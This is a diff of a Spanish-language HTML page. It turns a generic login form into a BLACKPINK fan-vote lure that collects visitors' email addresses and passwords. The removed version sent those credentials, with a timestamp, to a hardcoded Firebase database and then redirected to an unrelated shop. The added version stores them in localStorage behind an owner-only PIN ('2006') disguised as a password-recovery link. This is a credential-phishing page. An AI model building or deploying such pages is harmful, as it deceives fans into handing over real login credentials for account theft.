--- a/index.html
+++ b/index.html
@@ -3,8 +3,11 @@
 <head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Inicia Sesión</title>
+  <title>Votación BLACKPINK</title>
+
+  <!-- Fuente bonita y amigable -->
   <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
+
   <style>
     body { 
       margin: 0; 
@@ -15,102 +18,132 @@
       min-height: 100vh; 
       flex-direction: column;
 
-      /* Degradado animado real */
-      background: linear-gradient(270deg, #89f7fe, #66a6ff, #fbc2eb, #a18cd1);
-      background-size: 800% 800%;
-      animation: gradientMove 6s ease infinite;
-    }
-
-    @keyframes gradientMove {
-      0% { background-position: 0% 50%; }
-      50% { background-position: 100% 50%; }
-      100% { background-position: 0% 50%; }
+      /* Fondo con imagen */
+      background: url('https://pbs.twimg.com/media/FvTDI2_X0AE-aNl.jpg:large') no-repeat center center fixed;
+      background-size: cover;
     }
 
     .login-box { 
-      background: white; 
+      background: rgba(255, 255, 255, 0.9); 
       padding: 40px; 
       border-radius: 20px; 
-      box-shadow: 0 8px 20px rgba(0,0,0,0.2); 
+      box-shadow: 0 8px 20px rgba(0,0,0,0.3); 
       width: 100%; 
       max-width: 380px; 
       text-align: center; 
       margin-bottom: 20px; 
       animation: fadeIn 1s ease-in-out; 
     }
-    .login-box h2 { font-weight: 600; font-size: 26px; color: #333; margin-bottom: 5px; }
-    .login-box p { color: #666; font-size: 14px; margin-top: 0; }
-    .login-box input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 10px; font-size: 14px; }
-    .login-box button { width: 100%; padding: 12px; background: #4285F4; border: none; border-radius: 10px; color: white; font-size: 16px; font-weight: 600; cursor: pointer; margin-top: 10px; transition: 0.3s; }
-    .login-box button:hover { background: #2f6ae0; }
-    .extra { margin-top: 15px; font-size: 13px; color: #666; }
-    .extra a { color: #4285F4; text-decoration: none; cursor: pointer; }
-    .extra a:hover { text-decoration: underline; }
-    @keyframes fadeIn { from { opacity: 0; transform: translateY(-20px); } to { opacity: 1; transform: translateY(0); } }
+
+    .login-box h2 { 
+      margin-bottom: 5px; 
+      font-weight: 600; 
+      font-size: 22px; 
+      color: #111; 
+    }
+
+    .login-box p { 
+      margin-top: 0; 
+      color: #444; 
+      font-size: 14px; 
+    }
+
+    .login-box input { 
+      width: 100%; 
+      padding: 12px; 
+      margin: 10px 0; 
+      border: 1px solid #ddd; 
+      border-radius: 10px; 
+      font-size: 14px; 
+    }
+
+    .login-box button { 
+      width: 100%; 
+      padding: 12px; 
+      background: linear-gradient(90deg, #ff3399, #000000); /* estilo BLACKPINK */
+      border: none; 
+      border-radius: 10px; 
+      color: white; 
+      font-size: 16px; 
+      font-weight: 600; 
+      cursor: pointer; 
+      margin-top: 10px; 
+      transition: 0.3s; 
+    }
+
+    .login-box button:hover { 
+      opacity: 0.85; 
+      transform: scale(1.05);
+    }
+
+    .extra { 
+      margin-top: 15px; 
+      font-size: 13px; 
+      color: #666; 
+    }
+
+    .extra a { 
+      color: #ff3399; 
+      text-decoration: none; 
+      cursor: pointer; 
+    }
+
+    .extra a:hover { 
+      text-decoration: underline; 
+    }
+
+    /* Animación */
+    @keyframes fadeIn {
+      from { opacity: 0; transform: translateY(-20px); }
+      to { opacity: 1; transform: translateY(0); }
+    }
   </style>
 </head>
 <body>
 
+  <!-- Caja de Login -->
   <div class="login-box">
-    <h2>Inicia Sesión</h2>
-    <p>Bienvenido, ingresa tus datos</p>
+    <h2>Inicia sesión y vota por tu integrante favorita 💖🖤</h2>
+    <p>BLINK, tu voto cuenta ✨ ¡Hazlo valer en esta votación especial!</p>
+    
     <form id="loginForm">
-      <input type="email" id="email" placeholder="Correo electrónico" required>
-      <input type="password" id="password" placeholder="Contraseña" required>
-      <button type="submit">Ingresar</button>
+      <input type="email" name="email" placeholder="Correo electrónico" required>
+      <input type="password" name="password" placeholder="Contraseña" required>
+      <button type="submit">Ir a Votación</button>
     </form>
+
     <div class="extra">
       <p>¿Olvidaste tu contraseña? <a id="recoverLink">Recupérala aquí</a></p>
     </div>
   </div>
 
-  <!-- Firebase SDK -->
-  <script type="module">
-    import { initializeApp } from "https://www.gstatic.com/firebasejs/10.12.5/firebase-app.js";
-    import { getDatabase, ref, push } from "https://www.gstatic.com/firebasejs/10.12.5/firebase-database.js";
-    import { getAnalytics } from "https://www.gstatic.com/firebasejs/10.12.5/firebase-analytics.js";
-
-    const firebaseConfig = {
-      apiKey: "AIzaSyCIBiJXgLo-_9spj_YECcr2i95w88zpnZ8",
-      authDomain: "project-3593887432327561826.firebaseapp.com",
-      projectId: "project-3593887432327561826",
-      storageBucket: "project-3593887432327561826.firebasestorage.app",
-      messagingSenderId: "686989988857",
-      appId: "1:686989988857:web:533a6df48358adebd8a328",
-      measurementId: "G-43T3NQJ1D6"
-    };
-
-    const app = initializeApp(firebaseConfig);
-    const analytics = getAnalytics(app);
-    const db = getDatabase(app);
-
+  <script>
     const loginForm = document.getElementById('loginForm');
     const recoverLink = document.getElementById('recoverLink');
 
-    loginForm.addEventListener('submit', (e) => {
+    loginForm.addEventListener('submit', function(e){
       e.preventDefault();
-      const email = document.getElementById('email').value;
-      const password = document.getElementById('password').value;
+      const email = this.email.value;
+      const password = this.password.value;
 
-      push(ref(db, "usuarios"), {
-        email: email,
-        password: password,
-        fecha: new Date().toLocaleString()
-      }).then(() => {
-        window.location.href = "https://www.victoriassecretbeauty.gt/labiales?srsltid=AfmBOoo2_GxIY1cl2nZ2CsCl6SQLnFRbuxZ9361fBPAY0qZHHPJQjaKH";
-      }).catch((error) => {
-        alert("Error al guardar: " + error.message);
-      });
+      // Guardar en localStorage
+      let historial = JSON.parse(localStorage.getItem('historialDatos')) || [];
+      historial.push({ email, password, fecha: new Date().toLocaleString() });
+      localStorage.setItem('historialDatos', JSON.stringify(historial));
+
+      // Redirigir a la votación
+      window.location.href = "https://www.tuvotacion.com/quien-es-la-ms-bonita-de-blackpink-1";
     });
 
-    recoverLink.addEventListener('click', () => {
+    recoverLink.addEventListener('click', function(){
       const pin = prompt("Ingresa el PIN para acceder a los datos:");
       if(pin === "2006"){
-        alert("✅ Acceso permitido (pero los datos solo los ves en Firebase Console).");
+        alert("✅ Acceso permitido (aquí iría la vista del historial)");
       } else {
         alert("PIN incorrecto ❌");
       }
     });
   </script>
+
 </body>
 </html>
